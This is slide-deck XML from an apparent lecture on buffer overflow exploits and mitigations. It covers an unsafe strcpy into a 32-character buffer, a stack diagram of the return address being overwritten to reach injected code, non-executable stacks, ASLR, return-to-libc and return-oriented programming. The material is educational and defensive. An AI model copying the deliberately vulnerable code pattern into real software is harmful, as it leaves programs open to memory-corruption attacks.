            <a:off x="291152" y="3027614"/>
            <a:ext cx="2265529" cy="2895514"/>
            <a:chOff x="291152" y="3027614"/>
            <a:chExt cx="2265529" cy="2895514"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Left Brace 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AC1DF1C-4CEC-4393-9951-03EE3C9D6C1E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2374710" y="3027614"/>
              <a:ext cx="181971" cy="2895514"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrac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peech Bubble: Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{278495F2-CB8C-42CD-B0B1-165B6FD936EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="291152" y="3910084"/>
              <a:ext cx="1628633" cy="900752"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 60173"/>
                <a:gd name="adj2" fmla="val 997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Rarely used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72D007-E415-4A42-BF42-06358ECDC0BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="291152" y="5814179"/>
            <a:ext cx="2265529" cy="900752"/>
            <a:chOff x="291152" y="5814179"/>
            <a:chExt cx="2265529" cy="900752"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Left Brace 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9246A8B3-291E-41E1-B0A1-211CDB4E4C86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2374710" y="6014113"/>
              <a:ext cx="181971" cy="461835"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrac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peech Bubble: Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F99AB413-7552-4220-A688-678455B6EB48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="291152" y="5814179"/>
              <a:ext cx="1628633" cy="900752"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 60173"/>
                <a:gd name="adj2" fmla="val -113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Only for HTTP proxies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228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06FAB-78DC-4C88-B6FA-7B9F4C503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Non-executable Stacks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A3269-BBE7-4B65-A6C8-65D31B939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Modern CPUs set stack memory as read/write, but no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eXecute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Prevents shellcode from being placed on the stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2522395773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67FF8AB-7175-4037-803A-C1B4E82CD592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8567009" y="930303"/>
            <a:ext cx="2644364" cy="5295568"/>
            <a:chOff x="8567009" y="930303"/>
            <a:chExt cx="2644364" cy="529556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D490F5A-1E9E-4DF7-B65D-FF03E3819027}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8567009" y="930303"/>
              <a:ext cx="2644364" cy="5295568"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="wdUpDiag">
              <a:fgClr>
                <a:srgbClr val="FFC00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253C830-654B-4019-9D5F-E6EAEAAF5818}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8811364" y="5591997"/>
              <a:ext cx="2155655" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4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Non-Executable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79B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non-Executable Stack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B7E7A-4158-4A3A-9991-2A74F262C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8113" y="1825625"/>
            <a:ext cx="6384373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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> print(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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s) {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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// only holds 32 characters, max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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> buffer[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(buffer, s);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puts(buffer);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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]);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2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9258574" y="365125"/>
            <a:ext cx="1256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Memory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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567009" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11211377" y="826790"/>
            <a:ext cx="0" cy="556305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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="1825625"/>
            <a:ext cx="702874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0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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1: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2: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3:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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4: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5: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6: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7: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8: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5A080C8E-FFB2-4DB6-82F5-FE53CA42626B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250217" y="4159250"/>
            <a:ext cx="980105" cy="86512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F62BF2-F3FF-4D00-BE59-120561E20530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="1255059"/>
            <a:ext cx="2504140" cy="70522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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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58FE83-725B-4D37-ABD4-021E0287CD35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="2035939"/>
            <a:ext cx="2504140" cy="40246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argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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88226CC-58DF-4A7F-BA11-36AF21EA00AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3521889"/>
            <a:ext cx="2504140" cy="131088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buffer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8DB585E-751C-4FDD-9A5B-A85F7B19DE3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7861254" y="2232839"/>
            <a:ext cx="621041" cy="931710"/>
            <a:chOff x="7973123" y="2159723"/>
            <a:chExt cx="621041" cy="1345461"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Left Bracket 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8D45CC-5A52-493C-AB99-F7C144AE0D7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547880"/>
              <a:ext cx="179292" cy="698382"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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03EADBE-EC70-4A0C-8EB5-E410A92ACFC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7500447" y="2632399"/>
              <a:ext cx="13454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main()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A001156-8D8D-4DD5-9C0F-2A4C3E5C60C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7877104" y="3110809"/>
            <a:ext cx="605191" cy="1721962"/>
            <a:chOff x="7988973" y="2547879"/>
            <a:chExt cx="605191" cy="1209717"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Left Bracket 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADA7FCB-6917-4578-8649-A15085371812}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547879"/>
              <a:ext cx="179292" cy="1209717"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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BBB9F7A-3E34-4926-B407-BB1A4EBDC88D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7886815" y="2952683"/>
              <a:ext cx="6044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print()</a:t>
              </a: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7858E695-1AE5-40A2-81C6-A27A3CD39782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="2514057"/>
            <a:ext cx="2504140" cy="40246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IP = …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FC385A7-7B37-4C33-B4EA-D736063455BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3061224"/>
            <a:ext cx="2504140" cy="40246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IP = 7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18353E-2F42-4851-8167-95FED5933379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3521889"/>
            <a:ext cx="2502734" cy="1310882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Malicious code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E3671EE-A5B5-43D3-AAD4-BDA09CDD7538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8630335" y="3058115"/>
            <a:ext cx="2502734" cy="40557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IP = 952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30939EDD-8E4E-459C-88C8-D62F10A604C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="1272987"/>
            <a:ext cx="874602" cy="69924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:1000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:996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3E336E1A-0130-4DBF-8E72-72BF8F9F2EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="2069979"/>
            <a:ext cx="874602" cy="3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:992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8E7C77BC-52DC-4838-ADEB-DC796A5EF88C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="2564309"/>
            <a:ext cx="874602" cy="3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:988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C50640D3-06B7-4EAA-A236-7CB56E8025F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="3074447"/>
            <a:ext cx="874602" cy="3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:984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934E9726-0761-439B-8098-6C16DBEA3C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="4509952"/>
            <a:ext cx="874602" cy="3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:952</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82138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44444E-6 L 2.91667E-6 0.11389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0.11389 L 2.91667E-6 -0.38356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88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0.38356 L 2.91667E-6 -0.21574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0.21574 L 2.91667E-6 -0.10208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2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0.10208 L 0.59271 0.03519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35" y="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6" grpId="2" animBg="1"/>
      <p:bldP spid="16" grpId="3" animBg="1"/>
      <p:bldP spid="16" grpId="4" animBg="1"/>
      <p:bldP spid="16" grpId="5" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="29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4D255-3502-4F7D-AFB9-3FD7B045E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Address-space Layout Randomization (ASLR)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78BB6-461E-46EA-A113-B01A13042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Every time a program is loaded into memory, the location of code and data is changed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Makes it harder for the attacker to guess the destination of the buffer on the stack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Doesn’t prevent exploitation – just makes exploitation harder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In other words, increases the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>work factor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Supported by all modern operating systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But works best when the size of memory is very large</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2956098723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58D74-4A30-469F-8631-40A556405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Targets and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085A8-F93C-4187-B19D-D48E4A3E6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Existing mitigations make attacks harder, but not impossible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many other memory corruption bugs can be exploited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saved function pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap data structures (malloc overflow, double free, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerable format strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virtual tables (C++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Structured exception handlers (C++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No need for shellcode in many cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Existing program code can be repurposed in malicious ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return-oriented programming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407170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C9CC24-B375-4226-BF2B-61FADBBA6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70A28E-4FD8-4474-A206-E15B5EBB3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084747"/>
            <a:ext cx="12188952" cy="3294207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9647E21-5366-4638-AC97-D8CD4111E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r="8214" b="45501"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="4473360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8ECD8A6-945A-4663-9D24-7E0287644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925" y="2076450"/>
            <a:ext cx="10684151" cy="13451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Takeaways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5C7ACE-9E25-428E-A99E-7CDF262FD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71575" y="4473360"/>
            <a:ext cx="9469211" cy="8656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800" kern="12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5515748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926E5F-30C5-41E9-B38A-1060CA8F9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Exploits Exist?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D670CD-8305-46F7-8334-F23B999691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Exploits are weaponized program bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violate programmer assumptions about data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frequency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected special characters and delimiters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cause programs to behave unexpectedly/maliciously</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication and authorization bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violate integrity and confidentiality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567385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B6ED91-5667-4AA7-85FF-E7B4E4F695A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555631" y="1441938"/>
            <a:ext cx="7080738" cy="3974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Lesson 1</a:t>
            </a:r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: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Never trust input from the user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
